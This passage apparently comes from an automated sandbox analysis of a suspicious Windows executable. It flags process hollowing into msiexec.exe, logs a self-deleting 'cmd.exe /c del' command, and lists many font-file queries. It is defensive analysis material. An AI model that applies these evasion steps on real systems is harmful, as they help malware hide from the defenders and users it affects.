          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 1230000
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Process created: C:\Users\user\Desktop\g1EhgmCqCD.exe C:\Users\user\Desktop\g1EhgmCqCD.exe
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
          Source: explorer.exe, 00000004.00000002.909276935.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.675793329.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 00000009.00000002.911521958.0000000003250000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.675793329.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 00000009.00000002.911521958.0000000003250000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.675793329.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 00000009.00000002.911521958.0000000003250000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.675793329.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 00000009.00000002.911521958.0000000003250000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.693874904.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Users\user\Desktop\g1EhgmCqCD.exe VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
